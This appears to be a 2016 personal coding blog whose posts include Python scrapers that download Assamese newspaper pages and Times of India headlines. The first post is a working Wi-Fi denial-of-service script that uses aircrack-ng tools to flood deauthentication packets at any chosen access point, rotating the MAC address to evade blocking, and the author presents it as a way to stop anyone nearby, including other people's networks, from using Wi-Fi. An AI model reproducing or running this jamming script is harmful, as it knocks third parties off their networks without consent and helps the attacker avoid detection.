Saturday 10 December 2016

python script for ddosing wifi near by

This script will make sure that no body  near you can use wifi , whether router belong to you or some body else . Using this script you can jam all the wifi signals so that no can use it .


import os
import time
os.system('ifconfig wlan0 down')
os.system('iwconfig wlan0 mode monitor')
os.system('ifconfig wlan0 up')
os.system('airmon-ng check kill')
os.system('airmon-ng check kill')
print 'Select the bssid to attack: \nPress Ctl+c to stop'
time.sleep(2)
os.system('airodump-ng wlan0')
a=raw_input('Now provide me the bssid you want to ddos: ')
b=int(raw_input('Now provide at what channal is working: '))
os.system('iwconfig wlan0 channel %i'%b)
while True:
    os.system('aireplay-ng -0 5  -a %s wlan0'%a)
    os.system('ifconfig wlan0 down')
    os.system('macchanger  wlan0 -A')
    os.system('ifconfig wlan0 up')



you will get result like bellow :






Connect With Me: Facebook

Saturday 26 November 2016

python API for assamese news papers Pratidin

python API for assamese news papers Pratidin

Recently this news site changed the way it publishes news, so here is a new way to pull its papers onto your PC.


URL: http://www.asomiyapratidin.in/


import os,requests,bs4

# Download every page image of the Asomiya Pratidin e-paper for a
# user-supplied date into a fresh "<date>_pratidin/<section>/" tree.
os.system('rm -vfr *_pratidin*')          # wipe any previous download
t=raw_input('date formate 22-11-2016: ')  # e.g. 27-12-2016
os.system('mkdir %s_pratidin'%t)
os.chdir('%s_pratidin'%t)
# The date index page lists one <a> per paper section.
a=requests.get('http://www.asomiyapratidin.in/np-images/small/%s/'%t)
r=bs4.BeautifulSoup(a.content)
for i in range(len(r.find_all('a'))):
    os.system('mkdir %i'%(i+1))
    os.chdir('%i'%(i+1))
    # BUG FIX: the section and page URLs previously hard-coded the date
    # "27-12-2016" instead of using the date the user typed in, so any
    # other date silently fetched the wrong issue.
    c=requests.get('http://www.asomiyapratidin.in/np-images/small/%s/%i/'%(t,i+1))
    d=bs4.BeautifulSoup(c.content)
    # one <a> per page image inside the section listing
    for e in range(len(d.find_all('a'))):
        os.system('wget http://www.asomiyapratidin.in/np-images/small/%s/%i/%i.jpg'%(t,i+1,e+1))
    os.chdir('../')




or


import os,requests,bs4

# Same Asomiya Pratidin downloader, with the date pinned in code rather
# than prompted for (handy for cron / unattended runs).
os.system('rm -vfr *_pratidin*')  # wipe any previous download
t='27-12-2016'
#t=raw_input('date formate 22-11-2016: ')
os.system('mkdir %s_pratidin'%t)
os.chdir('%s_pratidin'%t)
# The date index page lists one <a> per paper section.
a=requests.get('http://www.asomiyapratidin.in/np-images/small/%s/'%t)
r=bs4.BeautifulSoup(a.content)
for i in range(len(r.find_all('a'))):
    os.system('mkdir %i'%(i+1))
    os.chdir('%i'%(i+1))
    # FIX: use t in the URLs (previously the same date was duplicated as a
    # literal here, so changing t alone would have fetched the wrong issue).
    c=requests.get('http://www.asomiyapratidin.in/np-images/small/%s/%i/'%(t,i+1))
    d=bs4.BeautifulSoup(c.content)
    # one <a> per page image inside the section listing
    for e in range(len(d.find_all('a'))):
        os.system('wget http://www.asomiyapratidin.in/np-images/small/%s/%i/%i.jpg'%(t,i+1,e+1))
    os.chdir('../')



Below is a screenshot of how it works.




Connect With Me: Facebook

python API for assamese news papers

Today I will scrape news from some of the news agencies, so you can download newspapers without visiting the news sites.

URLs
1.http://ganaadhikar.com/
2.http://www.dainikagradoot.com
3.http://www.assamtribune.com
4.http://dainikjanambhumi.co.in
5.http://www.assamiyakhabor.com
6.http://www.asomiyapratidin.in
7.http://www.assamtribune.com

Overall, I am going to use 7 Assamese newspapers for this experiment.

1.গনঅধিকাৰ :


import os

# Fetch the 12 page scans of the Ganaadhikar e-paper for a given date
# (date format ddmmyyyy, e.g. 22112016) into a fresh ./gana directory.
paper_date = raw_input('Give me the date of paper_like 22112016:')
os.system('rm -vfr gana')
os.system('mkdir gana')
os.chdir('gana')
for page in range(1, 13):
    os.system('wget http://ganaadhikar.com/%s/pages/page%s.gif' % (paper_date, page))



2.দৈনিক অগ্ৰদোত:

import os

# Download all 14 PDF pages of the Dainik Agradoot e-paper into ./agradut.
os.system('rm -vfr agradut')
os.system('mkdir agradut')
os.chdir('agradut')
page = 1
while page < 15:
    os.system('wget http://www.dainikagradoot.com/pages/page%d.pdf' % page)
    page += 1

3. দৈনিক অসম :

import os

# Grab the 15 Dainik Asom big-page scans for a date code like "nov2216"
# into a fresh ./dainik_asom directory.
date_code = raw_input('Date formate nov2216 :')
os.system('rm -vfr dainik_asom')
os.system('mkdir dainik_asom')
os.chdir('dainik_asom')
for page in range(1, 16):
    os.system('wget http://www.assamtribune.com/DA/2016/%s/BigPage%d.jpg' % (date_code, page))

4.অসমীয়া খবৰ :

import os,bs4

# Download the current Assamiya Khabor (Guwahati edition) pages.  Both the
# .png and the .jpg name are tried for each page, since the site has
# published under either extension.
os.system('rm -vfr khabar_gy')
os.system('mkdir khabar_gy')
os.chdir('khabar_gy')
for page in range(1, 15):
    for ext in ('png', 'jpg'):
        os.system(' wget http://www.assamiyakhabor.com/publishfinal/asset/guwahati/current/pages/ghy%d.' % page + ext)


5.প্ৰতিদিন :

import os , bs4,requests

# Download the Asomiya Pratidin pages for a chosen date, then shrink each
# downloaded page to 50% with ImageMagick's `convert`.
os.system('rm -vfr *_pratidin*')  # wipe any previous download
a1=requests.get('http://www.asomiyapratidin.in')
r=bs4.BeautifulSoup(a1.content)
os.system('clear')
a=raw_input('Print the date for which you want the news paper : Ex: 19-11-2016 ')
os.system('mkdir %s_pratidin'%a)
os.chdir('%s_pratidin'%a)
# one thumbnail link per page on the front page -> page count
c=len(r.find_all("div",{"id":"page-thumbnails"})[0].find_all('a'))+1
for i in range(1,c):
    os.system('wget http://www.asomiyapratidin.in/np-images/medium/ap-%s-%d.jpg'%(a,i))
os.system('clear')
# BUG FIX: the original resize loop used "$d" instead of "%d", contained a
# bare "50%" (invalid in %-formatting) and passed five arguments for three
# slots, so the format raised ValueError every pass and the bare
# `except: pass` silently skipped all resizing.  It also prefixed the path
# with "%s_pratidin/" even though we already chdir'd into that directory,
# and hard-coded 19 iterations instead of the discovered page count.
for i in range(1,c):
    os.system('convert ap-%s-%d.jpg -resize 50%% ap-%s-%d.jpg'%(a,i,a,i))

6.Assamtribune:

import os

# Pull the 16 Assam Tribune big-page scans for a date code like "nov2216"
# into a fresh ./tribune directory.
issue = raw_input('Date formate nov2216 :')
os.system('rm -vfr tribune')
os.system('mkdir tribune')
os.chdir('tribune')
page = 1
while page <= 16:
    os.system('wget http://www.assamtribune.com/at/2016/%s/BigPage%d.jpg' % (issue, page))
    page += 1


Below is a screenshot.





Connect With Me: Facebook




Friday 18 November 2016

The Times of India News API

Today I will create an API that brings you news from The Times of India news service.

URL used: http://timesofindia.indiatimes.com



This script will bring almost all the news data from this site .

Main Script :


import os , bs4,requests
b=requests.get('http://timesofindia.indiatimes.com/')
r=bs4.BeautifulSoup(b.content)
os.system('clear')
print 'Bellow are Lattest News:\n'
print r.find_all("ul",{"class":"list9"})[0].text.replace('\n\n','')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print'\nLinks are given bellow:\n\n'
for i in r.find_all("ul",{"class":"list9"})[0].find_all('a'):
        print i.get('href')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print '\nNews FROM ACROSS THE TIMES OF INDIA:\n'
for i in r.find_all("ul",{"data-vr-zone":"across_toi"})[0].find_all('a'):
        print i.text
raw_input('Press Enter to go ahead: ')
os.system('clear')
print'\nLinks are given bellow:\n\n'
for i in r.find_all("ul",{"data-vr-zone":"across_toi"})[0].find_all('a'):
        print i.get('href')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print "Bellow is the TOP NEWS STORIES:"
print r.find_all("ul",{"class":"list8"})[0].text.replace('\n\n','')
raw_input('Press Enter to go ahead: ')
os.system('clear')
for i in r.find_all("ul",{"class":"list8"})[0].find_all('a'):
        print i.get('href')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print 'Bellow is news from ENTERTAINMENT:'
for i in r.find_all("ul",{"class":"list8"})[1]:
        print i.text
raw_input('Press Enter to go ahead: ')
os.system('clear')
print 'Bellow are the links:'
for i in r.find_all("ul",{"class":"list8"})[1].find_all('a'):
        print i.get('href')
os.system('clear')
print '-----------------THE END---------------------'


Some of the output is shown below:




Connect With Me: Facebook

Popular Posts